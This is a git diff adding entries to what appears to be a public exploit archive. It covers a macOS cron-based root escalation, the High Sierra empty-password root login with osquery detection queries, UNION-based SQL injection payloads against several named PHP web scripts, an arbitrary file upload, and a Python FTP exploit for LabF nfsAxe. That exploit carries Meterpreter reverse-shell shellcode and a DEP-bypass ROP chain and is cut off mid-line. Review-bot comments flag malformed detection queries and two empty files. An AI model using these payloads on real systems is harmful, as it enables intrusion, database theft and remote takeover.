diff --git a/exploits/macos/local/43247.md b/exploits/macos/local/43247.md new file mode 100644 index 000000000..32663b68f --- /dev/null +++ b/exploits/macos/local/43247.md @@ -0,0 +1,19 @@ +Recently I was working on an security issue in some other software that has yet to be disclosed which created a rather interesting condition. As a non-root user I was able to write to any file on the system that was not SIP-protected but the resulting file would not be root-owned, even if it previously was. + +This presented an interesting challenge for privilege escalation - how would you exploit this to obtain root access? The obvious first attempt was the sudoers file but sudo is smart enough not to process it if the file isn't root-owned so that didn't work. + +I then discovered (after a tip from a friend - thanks pndc!) that the cron system in macOS does not care who the crontab files are owned by. Getting root was a simple case of creating a crontab file at: + +``` +/var/at/tabs/root +``` + +with a 60-second cron line, eg: + +``` +* * * * * chown root:wheel /tmp/payload && chmod 4755 /tmp/payload +``` + +and then waiting for it to execute. It's not clear if this is a macOS-specific issue or a hangover from the BSD-inherited cron system, I suspect the latter. + +The issue has been reported to Apple so hopefully they will fix it. \ No newline at end of file diff --git a/exploits/macos/local/43248.md b/exploits/macos/local/43248.md new file mode 100644 index 000000000..13de97f16 --- /dev/null +++ b/exploits/macos/local/43248.md 
@@ -0,0 +1,16 @@ +## Source: https://twitter.com/lemiorhan/status/935578694541770752 & https://forums.developer.apple.com/thread/79235 +"Dear @AppleSupport, we noticed a *HUGE* security issue at MacOS High Sierra. Anyone can login as "root" with empty password after clicking on login button several times. Are you aware of it @Apple?" + + +## Proof: https://twitter.com/patrickwardle/status/935608904377077761 + + +## Mitigation/Detection/Forensic: https://news.ycombinator.com/item?id=15800676 +- Can be mitigated by enabling the root user with a strong password +- Can be detected with `osquery` using `SELECT * FROM plist WHERE path = "/private/var/db/dslocal/nodes/Default/users/root.plist" AND key = "passwd" AND length(value) > 1;";` +- You can see what time the root account was enabled using `SELECT * FROM plist WHERE path = "/private/var/db/dslocal/nodes/Default/users/root.plist" WHERE key = "accountPolicyData";` then base 64 decoding that into a file and then running `plutil -convert xml1` and looking at the `passwordLastSetTime` field. +_Note: osquery needs to be running with `sudo` but if you have it deployed across a fleet of macs as a daemon then it will be running with `sudo` anyway._ +_Note: You can get the same info with plutil(1): `$ sudo plutil -p /private/var/db/dslocal/nodes/Default/users/root.plist`_ + + +## Security Advisory: https://support.apple.com/en-gb/HT208315 \ No newline at end of file diff --git a/exploits/php/webapps/43102.txt b/exploits/php/webapps/43102.txt index 4bc47379a..a32b63c50 100644 --- a/exploits/php/webapps/43102.txt +++ b/exploits/php/webapps/43102.txt @@ -21,6 +21,7 @@ # Proof of Concept: # # http://localhost/[PATH]/my_profile.php +# http://localhost/[PATH]/view/teacher_profile2.php # http://localhost/[PATH]/uploads/[FILE] # # Etc.. diff --git a/exploits/php/webapps/43235.txt b/exploits/php/webapps/43235.txt new file mode 100644 index 000000000..89e838517 --- /dev/null +++ b/exploits/php/webapps/43235.txt 
@@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: DomainSale PHP Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.codester.com/ChewiScripts +# Software Link: https://www.codester.com/items/5301/domainsale-php-script +# Demo: http://chewiscripts.x10host.com/domain/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/domain.php?id=[SQL] +# +# 14'++/*!11111UNION*/(/*!11111SELECT*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229)--+- +# +# http://server/domain.php?id=14'++/*!11111UNION*/(/*!11111SELECT*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229)--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43237.txt b/exploits/php/webapps/43237.txt new file mode 100644 index 000000000..6a5e23123 --- /dev/null +++ b/exploits/php/webapps/43237.txt 
@@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Simple Chatting System 1.0 - Arbitrary File Upload +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: http://yourphpscript.com/ +# Software Link: http://yourphpscript.com/index.php/product/simple-chatting-system-php-ajax-mysql-javascript/ +# Demo: http://chat.yourphpscript.com/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker upload arbitrary file.... +# +# Proof of Concept: +# +# Users profile picture arbitrary file can be uploaded .. +# +# http://localhost/[PATH]/view/my_profile.php +# http://localhost/[PATH]/uploads/[DATE].php +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43238.txt b/exploits/php/webapps/43238.txt new file mode 100644 index 000000000..50d88b39e --- /dev/null +++ b/exploits/php/webapps/43238.txt 
@@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: Website Auction Marketplace 2.0.5 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://flippa-clone.com/ +# Software Link: https://flippa-clone.com/ +# Demo: https://demo.flippa-clone.com/ +# Version: 2.0.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/search.php?cat_id=[SQL] +# +# 29' UNION(SELECT(1),(2),(3),(4),concat(version(),0x7e494853414e2053454e43414e),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60))-- - +# +# https://server/search.php?cat_id=29' UNION(SELECT(1),(2),(3),(4),concat(version(),0x7e494853414e2053454e43414e),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60))-- - +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43239.txt b/exploits/php/webapps/43239.txt new file mode 100644 index 000000000..7da6e61ea --- /dev/null +++ b/exploits/php/webapps/43239.txt 
@@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: Realestate Crowdfunding Script 2.7.2 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/realestate-crowdfunding-script/ +# Demo: http://thavasu.com/demo/crowdfunding/ +# Version: 2.7.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/single-cause.php?pid=[SQL] +# +# -23'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51))--+- +# +# http://server/single-cause.php?pid=-23'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51))--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43240.txt b/exploits/php/webapps/43240.txt new file mode 100644 index 000000000..51a1c75e0 --- /dev/null +++ b/exploits/php/webapps/43240.txt 
@@ -0,0 +1,37 @@ +# # # # # +# Exploit Title: FS Thumbtack Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/thumbtack-clone/ +# Demo: http://thumbtack-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/browse-category.php?cat=[SQL] +# +# -91a87ff679a2f3e71d9181a67b7542122c'++/*!22222UNION*/(/*!22222SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(4))--+- +# +# http://server/browse-category.php?cat=-91a87ff679a2f3e71d9181a67b7542122c'++/*!22222UNION*/(/*!22222SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(4))--+- +# +# +# 2) +# http://localhost/[PATH]/browse-scategory.php?sc=[SQL] +# +# -34202cb962ac59075b964b07152d234b70'++/*!22222UNION*/+/*!22222SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+- +# +# http://server/browse-scategory.php?sc=-34202cb962ac59075b964b07152d234b70'++/*!22222UNION*/+/*!22222SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43241.txt b/exploits/php/webapps/43241.txt new file mode 100644 index 000000000..b21f559bb --- /dev/null +++ b/exploits/php/webapps/43241.txt @@ -0,0 +1,30 @@ + + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/43242.txt b/exploits/php/webapps/43242.txt new file mode 100644 index 000000000..540a0bfe9 --- /dev/null +++ b/exploits/php/webapps/43242.txt @@ -0,0 +1,30 @@ + + + + + + \ No newline at end of file diff --git a/exploits/php/webapps/43243.txt b/exploits/php/webapps/43243.txt new file mode 100644 index 000000000..46f044887 --- /dev/null +++ b/exploits/php/webapps/43243.txt @@ -0,0 +1,30 @@ +# # # # # +# Exploit Title: FS Quibids Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/quibids-clone/ +# Demo: http://quibids-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/itechd.php?productid=[SQL] +# +# Parameter: productid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: productid=609 AND 2165=2165 +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43244.txt b/exploits/php/webapps/43244.txt new file mode 100644 index 000000000..eaca1106d --- /dev/null +++ b/exploits/php/webapps/43244.txt 
@@ -0,0 +1,36 @@ +# # # # # +# Exploit Title: FS Olx Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/olx-clone/ +# Demo: http://olx-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/subpage.php?scat=[SQL] +# +# 51'++UNION+ALL+SELECT+1,2,3,4,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+- +# +# http://server/subpage.php?scat=51'++UNION+ALL+SELECT+1,2,3,4,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+- +# +# 2) +# http://localhost/[PATH]/message.php?pid=[SQL] +# +# -1'++UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+- +# +# view-source:http://server/message.php?pid=-1'++UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+- +# +# # # # # \ No newline at end of file 
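Review bot: In exploits/php/webapps/43244.txt, the second example URL under item 2) carries a browser `view-source:` prefix (`view-source:http://server/message.php?pid=...`), while every other example URL in this patch uses the plain `http://server/...` form. Drop the prefix, or say in the description that the result only shows up in the page source, so the entry is consistent with the rest of the set.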
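Review bot: Both osquery statements in the Mitigation/Detection/Forensic list of exploits/macos/local/43248.md are malformed as written. The first ends with `length(value) > 1;";`, leaving a stray `";` after the terminating semicolon. The second chains two `WHERE` clauses (`WHERE path = ... WHERE key = "accountPolicyData"`), where the second keyword should be `AND`, as in the first query. Anyone pasting these for detection gets a syntax error, so both should be fixed before merge. Two smaller points in the same hunk: "base 64" should read "base64", and the two `_Note:` lines follow the last bullet with no blank line between, so they render as a continuation of that bullet.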
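Review bot: exploits/macos/local/43247.md has no header at all. The text starts straight at "Recently I was working on..." with no title, author, date, source link or tested macOS version, whereas the .txt entries added in this patch open with a structured header (Exploit Title, Date, Exploit Author, Tested on). Add the same fields here, including the macOS release on which the crontab ownership behaviour was observed, since the text itself says it is unclear whether the issue is macOS-specific. Also, "an security issue" in the first sentence should be "a security issue".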
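Review bot: exploits/php/webapps/43241.txt and exploits/php/webapps/43242.txt are each added with a `@@ -0,0 +1,30 @@` hunk, but every added line shown is empty. As submitted, the two entries carry no title, author or description. Confirm the files were committed with their intended content and that nothing was stripped by an encoding or tooling step. Drop them from the patch if they are placeholders.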
diff --git a/exploits/php/webapps/43245.txt b/exploits/php/webapps/43245.txt new file mode 100644 index 000000000..7f06f657c --- /dev/null +++ b/exploits/php/webapps/43245.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: FS Monster Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/monster-clone/ +# Demo: http://monster-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/Employer_Details.php?id=[SQL] +# +# -3'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32))--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/windows/remote/43236.py b/exploits/windows/remote/43236.py new file mode 100755 index 000000000..a6664e2dc --- /dev/null +++ b/exploits/windows/remote/43236.py 
@@ -0,0 +1,115 @@ +#!/usr/bin/env python +# +# Exploit Title : LabF nfsAxe 3.7 FTP Client (DEP Bypass) +# Date : 12/8/2017 +# Exploit Author : wetw0rk +# Vendor Homepage : http://www.labf.com/nfsaxe/nfs-server.html +# Software link : http://www.labf.com/download/nfsaxe.exe +# Version : 3.7 +# Tested on : Windows 7 (x86) +# Description : Upon connection the victim is sent a specially crafted buffer +# overwriting the SEH record, resulting in code execution. +# +# Greetz: abatchy17, mvrk, and Dillage (Dilly Dilly) +# +# Trigger the vulnerability by : +# Login as -> [check] anonymous -> connect +# + +import struct, socket + +host = "0.0.0.0" +port = 21 + +# msfvenom LHOST=192.168.0.12 LPORT=34 -p windows/meterpreter/reverse_tcp +# -f python -b "\x00\x0a\x10" -v shellcode --smallest +shellcode = "" +shellcode += "\x2b\xc9\x66\xb9\x18\x01\xe8\xff\xff\xff\xff\xc1" +shellcode += "\x5e\x30\x4c\x0e\x07\xe2\xfa\xfd\xea\x81\x04\x05" +shellcode += "\x06\x67\x81\xec\x3b\xcb\x68\x86\x5e\x3f\x9b\x43" +shellcode += "\x1e\x98\x46\x01\x9d\x65\x30\x16\xad\x51\x3a\x2c" +shellcode += "\xe1\xb3\x1c\x40\x5e\x21\x08\x05\xe7\xe8\x25\x28" +shellcode += "\xed\xc9\xde\x7f\x79\xa4\x62\x21\xb9\x79\x08\xbe" +shellcode += "\x7a\x26\x40\xda\x72\x3a\xed\x6c\xb5\x66\x60\x40" +shellcode += "\x91\xc8\x0d\x5d\xa5\x7d\x01\xc2\x7e\xc0\x4d\x9b" +shellcode += "\x7f\xb0\xfc\x90\x9d\x5e\x55\x92\x6e\xb7\x2d\xaf" +shellcode += "\x59\x26\xa4\x66\x23\x7b\x15\x85\x3a\xe8\x3c\x41" +shellcode += "\x67\xb4\x0e\xe2\x66\x20\xe7\x35\x72\x6e\xa3\xfa" +shellcode += "\x76\xf8\x75\xa5\xff\x33\x5c\x5d\x21\x20\x1d\x24" +shellcode += "\x24\x2e\x7f\x61\xdd\xdc\xde\x0e\x94\x6c\x05\xd4" +shellcode += "\xe2\xb8\xbe\x8d\x8e\xe7\xe7\xe2\xa0\xcc\xc0\xfd" +shellcode += "\xda\xe0\xbe\x9e\x65\x4e\x24\x0d\x9f\x9f\xa0\x88" +shellcode += "\x66\xf7\xf4\xcd\x8f\x27\xc3\xa9\x55\x7e\xc6\xa7" +shellcode += "\xc6\x6f\x18\xb1\xbe\xdb\xb6\xb5\xb6\x95\x31\x5f" +shellcode += "\xea\xeb\xec\xed\xfe\xef\x80\x91\xaa\x29\xcb\x1a" +shellcode += 
"\x26\x38\x1d\x5e\xa0\xdb\x9a\x9a\xa6\x56\x75\xa5" +shellcode += "\xb3\x2c\x01\x50\x16\xa3\xd4\x26\x94\xd3\xa9\x31" +shellcode += "\xb6\x2f\x55\x43\xb4\x1c\x31\x8f\xe6\x8d\xec\xbf" +shellcode += "\xbd\x83\xee\x34\x26\xb0\x0f\x24\x79\xc5\x9e\xb5" +shellcode += "\x9e\xf7\xe8\xf9\xfa\xad\x96\xfd\x96\xa7\xa4\x52" +shellcode += "\xe7\xfc\xd1\x96\x55\x6d\x08\x5f\x59\x5c\x64\x0f" +shellcode += "\xd7\xc7\x4f\xee\xc7\x12\xd7\x3c\xd0\x62\xf6\xda" + +def create_rop_chain(): + # https://www.corelan.be/index.php/security/corelan-ropdb/ + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = [ + 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN + 0xfffffdff, # Value to negate, will become 0x00000201 (dwSize) + 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll] + 0x7c3415a2, # JMP [EAX] [msvcr71.dll] + 0xffffffff, # + 0x7c376402, # skip 4 bytes [msvcr71.dll] + 0x7c351e05, # NEG EAX # RETN [msvcr71.dll] + 0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll] + 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] + 0x7c344f87, # POP EDX # RETN [msvcr71.dll] + 0xffffffc0, # Value to negate, will become 0x00000040 + 0x7c351eb1, # NEG EDX # RETN [msvcr71.dll] + 0x7c34d201, # POP ECX # RETN [msvcr71.dll] + 0x7c38b001, # &Writable location [msvcr71.dll] + 0x7c347f97, # POP EAX # RETN [msvcr71.dll] + 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] + 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] + 0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll] + ] + return ''.join(struct.pack('